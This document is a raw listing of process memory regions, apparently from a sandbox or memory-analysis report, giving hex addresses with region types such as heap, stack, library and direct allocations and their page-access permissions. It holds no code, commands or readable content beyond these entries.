3B4A000
trusted library allocation
page read and write
3635000
trusted library allocation
page read and write
3425000
heap
page read and write
2C2A000
stack
page read and write
7FFFFF20000
trusted library allocation
page execute and read and write
33EC000
stack
page read and write
4DEF000
heap
page read and write
34FD000
trusted library allocation
page read and write
1C850000
heap
page read and write
450E000
heap
page read and write
1A3000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
9E000
heap
page read and write
4C04000
heap
page read and write
401000
unkown
page execute read
3502000
trusted library allocation
page read and write
44F6000
heap
page read and write
4DD3000
heap
page read and write
1C76A000
stack
page read and write
2525000
trusted library allocation
page read and write
46C000
heap
page read and write
342A000
heap
page read and write
3379000
heap
page read and write
7FE8B340000
trusted library allocation
page read and write
1C20A000
heap
page read and write
3425000
heap
page read and write
3420000
heap
page read and write
2240000
heap
page read and write
5A0000
direct allocation
page read and write
3429000
heap
page read and write
1F60000
direct allocation
page read and write
F4000
heap
page read and write
1AE1D000
heap
page read and write
7FE89984000
trusted library allocation
page read and write
1E00000
heap
page read and write
33A6000
heap
page read and write
1E80000
heap
page read and write
3B4D000
trusted library allocation
page read and write
587000
direct allocation
page read and write
4721000
heap
page read and write
232000
stack
page read and write
30B000
heap
page read and write
2CD0000
trusted library allocation
page read and write
34C0000
remote allocation
page read and write
1A5CA000
stack
page read and write
7FE89940000
trusted library allocation
page execute and read and write
1C6CF000
stack
page read and write
21F0000
heap
page read and write
459A000
heap
page read and write
580000
direct allocation
page read and write
3B4A000
trusted library allocation
page read and write
B20000
heap
page read and write
3B4A000
trusted library allocation
page read and write
77C000
unkown
page read and write
1B50E000
stack
page read and write
2D30000
trusted library allocation
page read and write
20000
heap
page read and write
2B9000
heap
page read and write
F2000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
450F000
heap
page read and write
4508000
heap
page read and write
4EE000
heap
page read and write
400000
unkown
page readonly
2658000
trusted library allocation
page read and write
10000
heap
page read and write
3AE000
stack
page read and write
4679000
heap
page read and write
41CA000
stack
page read and write
1A92A000
stack
page read and write
588000
heap
page read and write
2EEF000
trusted library allocation
page read and write
246F000
stack
page read and write
514A000
heap
page read and write
4DE8000
heap
page read and write
34FD000
trusted library allocation
page read and write
2620000
heap
page read and write
1C8DF000
stack
page read and write
1C66000
heap
page read and write
2AD000
heap
page read and write
3B4A000
trusted library allocation
page read and write
111000
heap
page read and write
279000
heap
page read and write
786000
unkown
page read and write
2BF4000
heap
page read and write
3C8A000
trusted library allocation
page read and write
4C7A000
heap
page read and write
44F8000
heap
page read and write
4599000
heap
page read and write
3DBF000
trusted library allocation
page read and write
3DD000
heap
page read and write
7FE898A0000
trusted library allocation
page execute and read and write
2532000
trusted library allocation
page read and write
1D80000
direct allocation
page read and write
3628000
trusted library allocation
page read and write
4D1E000
heap
page read and write
25E0000
trusted library allocation
page read and write
1C40A000
heap
page read and write
21C0000
trusted library allocation
page execute read
3B4A000
trusted library allocation
page read and write
1C5CE000
stack
page read and write
5156000
heap
page read and write
5156000
heap
page read and write
239C000
stack
page read and write
5156000
heap
page read and write
900000
heap
page read and write
100000
heap
page read and write
4DD6000
heap
page read and write
10000
heap
page read and write
7A5000
unkown
page read and write
7FE89AE4000
trusted library allocation
page read and write
45A000
heap
page read and write
140000
direct allocation
page read and write
45B000
heap
page read and write
3B4D000
trusted library allocation
page read and write
1C2C7000
heap
page read and write
4395000
heap
page read and write
34F7000
trusted library allocation
page read and write
4DD6000
heap
page read and write
4560000
heap
page read and write
3502000
trusted library allocation
page read and write
1C290000
heap
page read and write
448A000
heap
page read and write
7AB000
unkown
page read and write
3352000
heap
page read and write
494000
heap
page read and write
4620000
heap
page read and write
4DD3000
heap
page read and write
464000
heap
page read and write
1AC49000
stack
page read and write
33DA000
heap
page read and write
1C30000
heap
page read and write
F0000
heap
page read and write
417000
heap
page read and write
34F1000
trusted library allocation
page read and write
20000
heap
page read and write
497000
heap
page read and write
470C000
heap
page read and write
440000
heap
page read and write
4DE8000
heap
page read and write
5120000
heap
page read and write
7FE89A90000
trusted library allocation
page read and write
25E0000
trusted library allocation
page read and write
474000
heap
page read and write
333E000
heap
page read and write
782000
unkown
page read and write
4DAD000
heap
page read and write
450D000
heap
page read and write
1A7B0000
heap
page read and write
450F000
heap
page read and write
3DBF000
trusted library allocation
page read and write
34C4000
heap
page read and write
474000
heap
page read and write
1FA7000
direct allocation
page read and write
4510000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
468E000
heap
page read and write
532A000
direct allocation
page execute and read and write
448A000
heap
page read and write
363F000
trusted library allocation
page read and write
3080000
trusted library allocation
page read and write
4C31000
heap
page read and write
4DAD000
heap
page read and write
410000
heap
page read and write
4DF0000
heap
page read and write
C8000
heap
page read and write
1B43C000
stack
page read and write
400000
unkown
page readonly
7FE8B260000
trusted library allocation
page read and write
3B4D000
trusted library allocation
page read and write
1C3E2000
heap
page read and write
4DD6000
heap
page read and write
4C36000
heap
page read and write
3635000
trusted library allocation
page read and write
7FE8B202000
trusted library allocation
page read and write
44FB000
heap
page read and write
890000
heap
page read and write
3C8A000
trusted library allocation
page read and write
4599000
heap
page read and write
4490000
heap
page read and write
3B4A000
trusted library allocation
page read and write
7AB000
unkown
page read and write
40B000
heap
page read and write
37CF000
stack
page read and write
140000
trusted library allocation
page read and write
3B4D000
trusted library allocation
page read and write
3384000
heap
page read and write
1B2D4000
heap
page read and write
44FB000
heap
page read and write
4589000
heap
page read and write
3AD0000
trusted library allocation
page read and write
4D1E000
heap
page read and write
7FE89962000
trusted library allocation
page read and write
7FE8B1DC000
trusted library allocation
page read and write
20000
heap
page read and write
154000
heap
page read and write
275000
stack
page read and write
CA000
heap
page read and write
2768000
heap
page read and write
65D000
heap
page read and write
3635000
trusted library allocation
page read and write
34F9000
trusted library allocation
page read and write
3B4D000
trusted library allocation
page read and write
3C8A000
trusted library allocation
page read and write
514C000
heap
page read and write
7FE8B315000
trusted library allocation
page read and write
4DAC000
heap
page read and write
1F34000
heap
page read and write
39C0000
trusted library allocation
page read and write
363F000
trusted library allocation
page read and write
4D1B000
heap
page read and write
1B1EF000
stack
page read and write
3B4D000
trusted library allocation
page read and write
4C02000
heap
page read and write
4DD6000
heap
page read and write
7FE89964000
trusted library allocation
page read and write
7FE899E0000
trusted library allocation
page read and write
7FE89790000
trusted library allocation
page read and write
29B000
heap
page read and write
33A0000
direct allocation
page execute and read and write
3DBF000
trusted library allocation
page read and write
2E8A000
trusted library allocation
page read and write
134000
heap
page read and write
4502000
heap
page read and write
F0000
heap
page read and write
400000
unkown
page readonly
34FA000
trusted library allocation
page read and write
19F000
direct allocation
page read and write
1BD0000
heap
page read and write
3DBF000
trusted library allocation
page read and write
1B1A0000
heap
page read and write
F0000
heap
page read and write
470000
heap
page read and write
34FD000
trusted library allocation
page read and write
4596000
heap
page read and write
514A000
heap
page read and write
3635000
trusted library allocation
page read and write
3635000
trusted library allocation
page read and write
2010000
heap
page execute and read and write
4599000
heap
page read and write
2DE3000
trusted library allocation
page read and write
4C23000
heap
page read and write
8DD000
heap
page read and write
5E0000
direct allocation
page read and write
4C3B000
heap
page read and write
4C04000
heap
page read and write
10000
heap
page read and write
4DF6000
heap
page read and write
4491000
heap
page read and write
5120000
heap
page read and write
4599000
heap
page read and write
3DBF000
trusted library allocation
page read and write
4DAD000
heap
page read and write
408000
unkown
page readonly
40E000
heap
page read and write
218F000
stack
page read and write
3B4A000
trusted library allocation
page read and write
17F000
heap
page read and write
45B000
heap
page read and write
4C3F000
heap
page read and write
3425000
heap
page read and write
33A4000
heap
page read and write
472000
heap
page read and write
1B15E000
stack
page read and write
4510000
heap
page read and write
3502000
trusted library allocation
page read and write
4C16000
heap
page read and write
419000
heap
page read and write
2000000
heap
page execute and read and write
4DD3000
heap
page read and write
4DD1000
heap
page read and write
280000
trusted library allocation
page read and write
24C5000
trusted library allocation
page read and write
3C8A000
trusted library allocation
page read and write
7FE89920000
trusted library allocation
page read and write
1DD6000
heap
page read and write
448A000
heap
page read and write
3DBF000
trusted library allocation
page read and write
4D97000
heap
page read and write
128000
heap
page read and write
363F000
trusted library allocation
page read and write
459A000
heap
page read and write
1B4FC000
stack
page read and write
7FE89A80000
trusted library allocation
page read and write
3502000
trusted library allocation
page read and write
400000
heap
page read and write
1C421000
heap
page read and write
5156000
heap
page read and write
458C000
heap
page read and write
7D7000
unkown
page readonly
41C000
heap
page read and write
134000
heap
page read and write
31D000
heap
page read and write
3C8000
stack
page read and write
44E000
heap
page read and write
474000
heap
page read and write
7FE899A0000
trusted library allocation
page read and write
59B000
direct allocation
page read and write
3330000
heap
page read and write
3B4D000
trusted library allocation
page read and write
29B000
heap
page read and write
1B790000
heap
page read and write
8EB000
heap
page read and write
3C8A000
trusted library allocation
page read and write
729F4000
unkown
page readonly
4DAD000
heap
page read and write
40F000
heap
page read and write
4715000
heap
page read and write
310000
heap
page read and write
52E0000
trusted library allocation
page read and write
3B0000
heap
page read and write
1C1F8000
heap
page read and write
464000
heap
page read and write
7FE8B1F0000
trusted library allocation
page execute and read and write
346B000
stack
page read and write
7D7000
unkown
page readonly
1C215000
heap
page read and write
334D000
heap
page read and write
7FE8B07C000
trusted library allocation
page execute and read and write
451C000
heap
page read and write
40A000
unkown
page read and write
154000
heap
page read and write
34FB000
trusted library allocation
page read and write
3C8A000
trusted library allocation
page read and write
4DD3000
heap
page read and write
7FE89950000
trusted library allocation
page execute and read and write
3C8A000
trusted library allocation
page read and write
4490000
heap
page read and write
2CBB000
heap
page read and write
1C06000
heap
page read and write
3DE1000
trusted library allocation
page read and write
3384000
heap
page read and write
154000
heap
page read and write
279000
heap
page read and write
309000
heap
page read and write
2AD000
heap
page read and write
470000
heap
page read and write
7FE8B228000
trusted library allocation
page read and write
450F000
heap
page read and write
4594000
heap
page read and write
36CC000
stack
page read and write
5120000
heap
page read and write
7FE89A30000
trusted library allocation
page read and write
4C12000
heap
page read and write
657000
heap
page read and write
290000
heap
page read and write
462D000
heap
page read and write
450A000
heap
page read and write
2F0000
heap
page read and write
7FE8B2D0000
trusted library allocation
page read and write
475B000
heap
page read and write
145000
heap
page read and write
1A0000
direct allocation
page read and write
1C3D2000
heap
page read and write
4715000
heap
page read and write
601000
heap
page read and write
1FB7000
direct allocation
page read and write
1C3FB000
heap
page read and write
307000
heap
page read and write
3B4D000
trusted library allocation
page read and write
4DE8000
heap
page read and write
540000
direct allocation
page read and write
3C8A000
trusted library allocation
page read and write
40AB000
stack
page read and write
3700000
trusted library allocation
page execute
4D4B000
heap
page read and write
7FE8B140000
trusted library allocation
page execute and read and write
5E9000
heap
page read and write
26B0000
trusted library allocation
page execute
3B4D000
trusted library allocation
page read and write
44F8000
heap
page read and write
2665000
trusted library allocation
page read and write
3DBF000
trusted library allocation
page read and write
509000
heap
page read and write
462C000
heap
page read and write
450B000
heap
page read and write
3C8A000
trusted library allocation
page read and write
1C1D0000
heap
page read and write
4599000
heap
page read and write
3B4D000
trusted library allocation
page read and write
3DBF000
trusted library allocation
page read and write
286000
heap
page read and write
4321000
heap
page read and write
320000
heap
page read and write
468E000
heap
page read and write
1A2C0000
heap
page read and write
462000
heap
page read and write
1B350000
heap
page read and write
40B000
heap
page read and write
7FE8B350000
trusted library allocation
page read and write
356000
heap
page read and write
262B000
heap
page read and write
3DBF000
trusted library allocation
page read and write
363F000
trusted library allocation
page read and write
3C8A000
trusted library allocation
page read and write
7FE8B106000
trusted library allocation
page execute and read and write
44FB000
heap
page read and write
1AD92000
heap
page read and write
7FE8B0E0000
trusted library allocation
page execute and read and write
1A470000
heap
page read and write
390000
heap
page read and write
786000
unkown
page read and write
475000
heap
page read and write
3B4D000
trusted library allocation
page read and write
3DBF000
trusted library allocation
page read and write
4C33000
heap
page read and write
111000
heap
page read and write
382000
heap
page read and write
50E1000
heap
page read and write
4DD6000
heap
page read and write
1B220000
heap
page read and write
33A6000
heap
page read and write
3DBF000
trusted library allocation
page read and write
34B0000
heap
page read and write
451F000
heap
page read and write
43AB000
heap
page read and write
3F6000
heap
page read and write
4746000
heap
page read and write
3349000
heap
page read and write
2F75000
trusted library allocation
page read and write
7FE8B2B0000
trusted library allocation
page read and write
7E0000
heap
page read and write
129000
heap
page read and write
451C000
heap
page read and write
4679000
heap
page read and write
124A1000
trusted library allocation
page read and write
7FE8983C000
trusted library allocation
page execute and read and write
7FD000
heap
page read and write
7FE89933000
trusted library allocation
page read and write
497000
heap
page read and write
77C000
unkown
page read and write
3B4D000
trusted library allocation
page read and write
10000
heap
page read and write
1C25C000
heap
page read and write
10000
heap
page read and write
1B19F000
stack
page read and write
3DBF000
trusted library allocation
page read and write
3B4D000
trusted library allocation
page read and write
4DB0000
heap
page read and write
3DBF000
trusted library allocation
page read and write
439E000
heap
page read and write
4DE8000
heap
page read and write
3DBF000
trusted library allocation
page read and write
111000
heap
page read and write
3384000
heap
page read and write
4712000
heap
page read and write
451C000
heap
page read and write
4329000
heap
page read and write
2C6000
heap
page read and write
363F000
trusted library allocation
page read and write
4504000
heap
page read and write
439E000
heap
page read and write
274000
heap
page read and write
53E9000
heap
page read and write
3635000
trusted library allocation
page read and write
10000
heap
page read and write
4490000
heap
page read and write
369000
heap
page read and write
309000
heap
page read and write
1ADAD000
heap
page read and write
4C34000
heap
page read and write
782000
unkown
page read and write
7FE89970000
trusted library allocation
page execute and read and write
509000
heap
page read and write
122CF000
trusted library allocation
page read and write
22BF000
stack
page read and write
473000
heap
page read and write
94D000
heap
page read and write
19D000
direct allocation
page read and write
432F000
stack
page read and write
5EA000
heap
page read and write
4C41000
heap
page read and write
5154000
heap
page read and write
40C0000
heap
page read and write
1A7B4000
heap
page read and write
4650000
heap
page read and write
307F000
trusted library allocation
page read and write
4749000
heap
page read and write
339C000
stack
page read and write
3DBF000
trusted library allocation
page read and write
5154000
heap
page read and write
129000
heap
page read and write
5149000
heap
page read and write
44FB000
heap
page read and write
1B0000
trusted library allocation
page read and write
3C8A000
trusted library allocation
page read and write
450B000
heap
page read and write
363F000
trusted library allocation
page read and write
4D1B000
heap
page read and write
363F000
trusted library allocation
page read and write
451E000
heap
page read and write
34F5000
trusted library allocation
page read and write
308000
heap
page read and write
3379000
heap
page read and write
34F3000
trusted library allocation
page read and write
313000
heap
page read and write
252B000
trusted library allocation
page read and write
1B39E000
stack
page read and write
33C5000
heap
page read and write
12C000
stack
page read and write
7FE89AF6000
trusted library allocation
page read and write
3B4A000
trusted library allocation
page read and write
1C98F000
stack
page read and write
2764000
heap
page read and write
1B510000
heap
page read and write
1C24B000
heap
page read and write
7FE8B022000
trusted library allocation
page read and write
4DEB000
heap
page read and write
3DBF000
trusted library allocation
page read and write
464000
heap
page read and write
789000
unkown
page read and write
1AEFE000
stack
page read and write
3B4D000
trusted library allocation
page read and write
4EE000
heap
page read and write
474000
heap
page read and write
5156000
heap
page read and write
7FE8B329000
trusted library allocation
page read and write
4DE8000
heap
page read and write
313000
heap
page read and write
1A68E000
heap
page execute and read and write
1AE6F000
heap
page read and write
7FE8B360000
trusted library allocation
page read and write
3DBF000
trusted library allocation
page read and write
180000
trusted library allocation
page read and write
1DC0000
direct allocation
page read and write
4320000
heap
page read and write
1A4000
heap
page read and write
3DBF000
trusted library allocation
page read and write
9A7000
heap
page read and write
3C8A000
trusted library allocation
page read and write
1B6EE000
stack
page read and write
89000
stack
page read and write
3DBF000
trusted library allocation
page read and write
1C88C000
stack
page read and write
310000
heap
page read and write
4746000
heap
page read and write
4599000
heap
page read and write
44F4000
heap
page read and write
7FE8979B000
trusted library allocation
page read and write
3C8A000
trusted library allocation
page read and write
4EE000
heap
page read and write
33B9000
heap
page read and write
4560000
heap
page read and write
3635000
trusted library allocation
page read and write
1C700000
heap
page read and write
4521000
heap
page read and write
475B000
heap
page read and write
3B8000
stack
page read and write
1A730000
heap
page execute and read and write
509000
heap
page read and write
1B500000
heap
page read and write
394000
heap
page read and write
46CA000
heap
page read and write
1A7E4000
heap
page read and write
7D7000
unkown
page readonly
52E0000
trusted library allocation
page read and write
64E000
heap
page read and write
3900000
trusted library allocation
page read and write
47A000
heap
page read and write
22FF000
stack
page read and write
459A000
heap
page read and write
20000
heap
page read and write
5C0000
direct allocation
page read and write
7FE8B023000
trusted library allocation
page execute and read and write
5159000
heap
page read and write
475D000
heap
page read and write
1B2D0000
heap
page read and write
46C000
heap
page read and write
C0000
heap
page read and write
4679000
heap
page read and write
4DD1000
heap
page read and write
3DBF000
trusted library allocation
page read and write
3DBF000
trusted library allocation
page read and write
1F80000
direct allocation
page read and write
12481000
trusted library allocation
page read and write
7FE8B2E0000
trusted library allocation
page read and write
4749000
heap
page read and write
44BA000
heap
page read and write
7FE8B030000
trusted library allocation
page read and write
7FE89AB0000
trusted library allocation
page read and write
7D1000
unkown
page read and write
3B4A000
trusted library allocation
page read and write
1AAB9000
stack
page read and write
7FE8B204000
trusted library allocation
page read and write
1EF000
trusted library allocation
page read and write
197000
heap
page read and write
2D6000
heap
page read and write
134000
heap
page read and write
26B0000
trusted library allocation
page read and write
2A8000
heap
page read and write
1CF0000
trusted library allocation
page read and write
4D21000
heap
page read and write
3502000
trusted library allocation
page read and write
605000
heap
page read and write
4DF6000
heap
page read and write
4741000
heap
page read and write
10000
heap
page read and write
34FD000
trusted library allocation
page read and write
1A833000
heap
page read and write
266000
heap
page read and write
29B000
heap
page read and write
3635000
trusted library allocation
page read and write
321000
heap
page read and write
3B4D000
trusted library allocation
page read and write
33C4000
heap
page read and write
3B4D000
trusted library allocation
page read and write
27DE000
stack
page read and write
100000
heap
page read and write
3D6000
heap
page read and write
3502000
trusted library allocation
page read and write
3635000
trusted library allocation
page read and write
264F000
stack
page read and write
7FE897A0000
trusted library allocation
page read and write
1247F000
trusted library allocation
page read and write
1A738000
heap
page execute and read and write
63F000
heap
page read and write
34F5000
trusted library allocation
page read and write
40A000
unkown
page write copy
7FE89793000
trusted library allocation
page read and write
120000
heap
page read and write
22C1000
trusted library allocation
page read and write
321000
heap
page read and write
18A000
heap
page read and write
3C8A000
trusted library allocation
page read and write
33DB000
heap
page read and write
334B000
heap
page read and write
3635000
trusted library allocation
page read and write
50E1000
heap
page read and write
3B4D000
trusted library allocation
page read and write
7FE89A9D000
trusted library allocation
page read and write
3C0000
heap
page read and write
3B4D000
trusted library allocation
page read and write
4DEE000
heap
page read and write
40A000
unkown
page write copy
21B2000
heap
page read and write
8B4000
heap
page read and write
4502000
heap
page read and write
33C3000
heap
page read and write
474000
heap
page read and write
419000
heap
page read and write
2EE000
heap
page read and write
3AA0000
trusted library allocation
page read and write
4599000
heap
page read and write
1C3C5000
heap
page read and write
475B000
heap
page read and write
450D000
heap
page read and write
3425000
heap
page read and write
53E5000
heap
page read and write
2523000
trusted library allocation
page read and write
3AE000
heap
page read and write
474000
heap
page read and write
3F6000
heap
page read and write
28BF000
stack
page read and write
458D000
heap
page read and write
4C23000
heap
page read and write
4DEF000
heap
page read and write
3E0F000
stack
page read and write
1EC0000
direct allocation
page read and write
4589000
heap
page read and write
3A20000
heap
page read and write
2C80000
heap
page read and write
30F0000
heap
page read and write
2244000
heap
page read and write
3429000
heap
page read and write
46C000
heap
page read and write
300000
heap
page read and write
33C8000
heap
page read and write
4500000
heap
page read and write
4DE8000
heap
page read and write
1DA0000
direct allocation
page read and write
440000
heap
page read and write
439E000
heap
page read and write
4488000
heap
page read and write
4599000
heap
page read and write
4DF9000
heap
page read and write
4596000
heap
page read and write
1C265000
heap
page read and write
2375000
heap
page read and write
10000
heap
page read and write
3352000
heap
page read and write
1A650000
heap
page execute and read and write
34FD000
trusted library allocation
page read and write
363F000
trusted library allocation
page read and write
4DD1000
heap
page read and write
3502000
trusted library allocation
page read and write
122F1000
trusted library allocation
page read and write
474000
heap
page read and write
3C8A000
trusted library allocation
page read and write
471C000
heap
page read and write
60000
heap
page read and write
40A000
unkown
page read and write
7FE8B0DC000
trusted library allocation
page execute and read and write
3539000
heap
page read and write
7FE89A40000
trusted library allocation
page read and write
729F6000
unkown
page readonly
4D97000
heap
page read and write
3F2A000
direct allocation
page execute and read and write
2219000
stack
page read and write
3DBF000
trusted library allocation
page read and write
1C60E000
stack
page read and write
3940000
heap
page read and write
2EB0000
heap
page read and write
663000
heap
page read and write
1A76E000
heap
page execute and read and write
2EDF000
stack
page read and write
26AF000
stack
page read and write
5159000
heap
page read and write
4679000
heap
page read and write
34F3000
trusted library allocation
page read and write
FE000
heap
page read and write
F0000
heap
page read and write
19D000
heap
page read and write
20000
heap
page read and write
3379000
heap
page read and write
2655000
trusted library allocation
page read and write
141000
heap
page read and write
451C000
heap
page read and write
308000
heap
page read and write
4521000
heap
page read and write
134000
heap
page read and write
3502000
trusted library allocation
page read and write
3420000
heap
page read and write
4B80000
heap
page read and write
3B4A000
trusted library allocation
page read and write
6A2B1000
unkown
page execute read
7FE89836000
trusted library allocation
page read and write
2B2000
heap
page read and write
474000
heap
page read and write
5D2A000
direct allocation
page execute and read and write
33A4000
heap
page read and write
B26000
heap
page read and write
3425000
heap
page read and write
494000
heap
page read and write
270000
heap
page read and write
471E000
heap
page read and write
1A52F000
stack
page read and write
134000
heap
page read and write
7A5000
unkown
page read and write
183000
direct allocation
page read and write
1ADDB000
heap
page read and write
160000
heap
page read and write
4DE8000
heap
page read and write
180000
direct allocation
page read and write
451C000
heap
page read and write
7FE89A10000
trusted library allocation
page read and write
1EA0000
direct allocation
page read and write
1CC1F000
stack
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
5159000
heap
page read and write
3695000
heap
page read and write
3B4A000
trusted library allocation
page read and write
1EB6000
heap
page read and write
1A7DF000
stack
page read and write
4D22000
heap
page read and write
3384000
heap
page read and write
3B4A000
trusted library allocation
page read and write
7FE8B024000
trusted library allocation
page read and write
4D65000
heap
page read and write
2F0000
heap
page read and write
3E9000
heap
page read and write
4596000
heap
page read and write
392E000
stack
page read and write
494000
heap
page read and write
1AE0C000
heap
page read and write
225000
stack
page read and write
1A875000
heap
page read and write
3DBF000
trusted library allocation
page read and write
34F9000
trusted library allocation
page read and write
2A6D000
trusted library allocation
page read and write
45A000
heap
page read and write
3504000
trusted library allocation
page read and write
7FE89782000
trusted library allocation
page read and write
7FE8B250000
trusted library allocation
page read and write
3428000
heap
page read and write
7FE8B320000
trusted library allocation
page read and write
630000
heap
page read and write
1E0000
trusted library allocation
page read and write
408000
unkown
page readonly
1F40000
direct allocation
page read and write
3B4A000
trusted library allocation
page read and write
46C000
heap
page read and write
3DBF000
trusted library allocation
page read and write
410000
heap
page read and write
1C97F000
stack
page read and write
3628000
trusted library allocation
page read and write
122D1000
trusted library allocation
page read and write
4508000
heap
page read and write
1A83C000
heap
page read and write
1A8B0000
heap
page read and write
3DBF000
trusted library allocation
page read and write
5156000
heap
page read and write
2E8D000
trusted library allocation
page read and write
514C000
heap
page read and write
494000
heap
page read and write
282000
heap
page read and write
7FE89A60000
trusted library allocation
page read and write
4521000
heap
page read and write
1F00000
direct allocation
page read and write
5EE000
heap
page read and write
1A6DB000
stack
page read and write
363F000
trusted library allocation
page read and write
4DB1000
heap
page read and write
4EB000
heap
page read and write
1B795000
heap
page read and write
334F000
heap
page read and write
3B4A000
trusted library allocation
page read and write
3D4000
heap
page read and write
33A4000
heap
page read and write
451C000
heap
page read and write
3C8A000
trusted library allocation
page read and write
7FE8B1E0000
trusted library allocation
page execute and read and write
7FE89980000
trusted library allocation
page read and write
4679000
heap
page read and write
451C000
heap
page read and write
4DF0000
heap
page read and write
4703000
heap
page read and write
1C232000
heap
page read and write
3B4A000
trusted library allocation
page read and write
7FE899B0000
trusted library allocation
page read and write
1DA0000
heap
page read and write
33DB000
heap
page read and write
4D1B000
heap
page read and write
4502000
heap
page read and write
111000
heap
page read and write
7FE89840000
trusted library allocation
page execute and read and write
319000
heap
page read and write
266F000
trusted library allocation
page read and write
59D000
direct allocation
page read and write
7FE8B290000
trusted library allocation
page read and write
18F000
trusted library allocation
page read and write
7FE89988000
trusted library allocation
page read and write
19E000
heap
page read and write
2370000
heap
page read and write
59F000
direct allocation
page read and write
122C1000
trusted library allocation
page read and write
419000
heap
page read and write
7FE8B370000
trusted library allocation
page read and write
1A804000
heap
page read and write
2AB0000
trusted library allocation
page read and write
7FE89AFA000
trusted library allocation
page read and write
451C000
heap
page read and write
6A2B4000
unkown
page readonly
230000
heap
page read and write
1C3AC000
heap
page read and write
7FE8B033000
trusted library allocation
page read and write
470000
heap
page read and write
4C31000
heap
page read and write
2360000
remote allocation
page read and write
26B0000
trusted library allocation
page read and write
1FA7000
direct allocation
page read and write
5EC000
heap
page read and write
260000
heap
page read and write
494000
heap
page read and write
3350000
heap
page read and write
4EB000
heap
page read and write
897000
heap
page read and write
4C01000
heap
page read and write
7FE89866000
trusted library allocation
page execute and read and write
3C8A000
trusted library allocation
page read and write
448E000
heap
page read and write
39D000
heap
page read and write
4DEE000
heap
page read and write
89000
stack
page read and write
4C23000
heap
page read and write
3B4A000
trusted library allocation
page read and write
4749000
heap
page read and write
459000
heap
page read and write
2529000
trusted library allocation
page read and write
4C00000
heap
page read and write
7FE8B280000
trusted library allocation
page read and write
363F000
trusted library allocation
page read and write
7FE89A70000
trusted library allocation
page read and write
46D000
heap
page read and write
414000
heap
page read and write
4DD3000
heap
page read and write
2AF000
heap
page read and write
3A0000
heap
page read and write
363F000
trusted library allocation
page read and write
4504000
heap
page read and write
464F000
heap
page read and write
7FE89A50000
trusted library allocation
page read and write
3503000
trusted library allocation
page read and write
4508000
heap
page read and write
1A448000
stack
page read and write
4509000
heap
page read and write
7FE89A00000
trusted library allocation
page read and write
43B2000
heap
page read and write
4AE000
heap
page read and write
2760000
heap
page read and write
1B11C000
stack
page read and write
4560000
heap
page read and write
4DEE000
heap
page read and write
3B4D000
trusted library allocation
page read and write
384000
heap
page read and write
50E0000
heap
page read and write
133000
heap
page read and write
24C4000
trusted library allocation
page read and write
4DD6000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
3C8A000
trusted library allocation
page read and write
4560000
heap
page read and write
458C000
heap
page read and write
1C3C0000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
2F4A000
trusted library allocation
page read and write
7FE89B00000
trusted library allocation
page read and write
7FE89B10000
trusted library allocation
page read and write
4C29000
heap
page read and write
4C12000
heap
page read and write
3D0000
heap
page read and write
33C6000
heap
page read and write
12A000
heap
page read and write
2B0000
heap
page read and write
3379000
heap
page read and write
3B4A000
trusted library allocation
page read and write
1B09E000
stack
page read and write
10000
heap
page read and write
43DA000
heap
page read and write
450F000
heap
page read and write
450D000
heap
page read and write
497000
heap
page read and write
7D7000
unkown
page readonly
3502000
trusted library allocation
page read and write
7FE89783000
trusted library allocation
page execute and read and write
2D00000
trusted library allocation
page read and write
4DD1000
heap
page read and write
21F0000
heap
page execute and read and write
7FE89BA0000
trusted library allocation
page read and write
7FE89B50000
trusted library allocation
page read and write
672A000
direct allocation
page execute and read and write
464000
heap
page read and write
361E000
stack
page read and write
3B4A000
trusted library allocation
page read and write
464B000
heap
page read and write
7FE8B230000
trusted library allocation
page read and write
2527000
trusted library allocation
page read and write
7FE8B2C0000
trusted library allocation
page read and write
3352000
heap
page read and write
3429000
heap
page read and write
7FE8B300000
trusted library allocation
page read and write
12F000
heap
page read and write
160000
trusted library allocation
page read and write
3625000
trusted library allocation
page read and write
3B4D000
trusted library allocation
page read and write
712A000
direct allocation
page execute and read and write
33C3000
heap
page read and write
7B2A000
direct allocation
page execute and read and write
4508000
heap
page read and write
7FE89AC3000
trusted library allocation
page read and write
2AE000
heap
page read and write
4714000
heap
page read and write
448E000
heap
page read and write
3379000
heap
page read and write
2C85000
heap
page read and write
3B4D000
trusted library allocation
page read and write
33A6000
heap
page read and write
4415000
heap
page read and write
3C8A000
trusted library allocation
page read and write
2624000
heap
page read and write
187000
direct allocation
page read and write
7FE89937000
trusted library allocation
page read and write
2521000
trusted library allocation
page read and write
7FE8B220000
trusted library allocation
page read and write
2BA0000
trusted library allocation
page execute read
4508000
heap
page read and write
4DD6000
heap
page read and write
294000
heap
page read and write
3350000
heap
page read and write
475000
heap
page read and write
53E0000
heap
page read and write
261D000
stack
page read and write
3B4A000
trusted library allocation
page read and write
1F90000
direct allocation
page read and write
434000
heap
page read and write
4500000
heap
page read and write
7FE8B2A0000
trusted library allocation
page read and write
4596000
heap
page read and write
5156000
heap
page read and write
45A000
heap
page read and write
1AA0E000
stack
page read and write
415000
heap
page read and write
729F0000
unkown
page readonly
334C000
heap
page read and write
1A0000
heap
page read and write
7FE89AFD000
trusted library allocation
page read and write
1D60000
direct allocation
page read and write
4C16000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
4596000
heap
page read and write
19C000
stack
page read and write
3352000
heap
page read and write
1F30000
heap
page read and write
462000
heap
page read and write
3B4D000
trusted library allocation
page read and write
2BF0000
heap
page read and write
789000
unkown
page read and write
4509000
heap
page read and write
4EB000
heap
page read and write
1C347000
heap
page read and write
43A2000
heap
page read and write
7FE8B240000
trusted library allocation
page read and write
3CD0000
heap
page read and write
3DE1000
trusted library allocation
page read and write
1A87F000
stack
page read and write
1B7CB000
heap
page read and write
462000
heap
page read and write
468E000
heap
page read and write
4B20000
trusted library allocation
page read and write
12E000
heap
page read and write
3502000
trusted library allocation
page read and write
450E000
heap
page read and write
16B000
heap
page read and write
448A000
heap
page read and write
3628000
trusted library allocation
page read and write
476000
heap
page read and write
4D1F000
heap
page read and write
475C000
heap
page read and write
3B0000
heap
page read and write
4749000
heap
page read and write
6A2B0000
unkown
page readonly
33DB000
heap
page read and write
4DE8000
heap
page read and write
231E000
trusted library allocation
page read and write
2A6F000
trusted library allocation
page read and write
100000
heap
page read and write
12426000
trusted library allocation
page read and write
3421000
heap
page read and write
1FB0000
direct allocation
page read and write
363F000
trusted library allocation
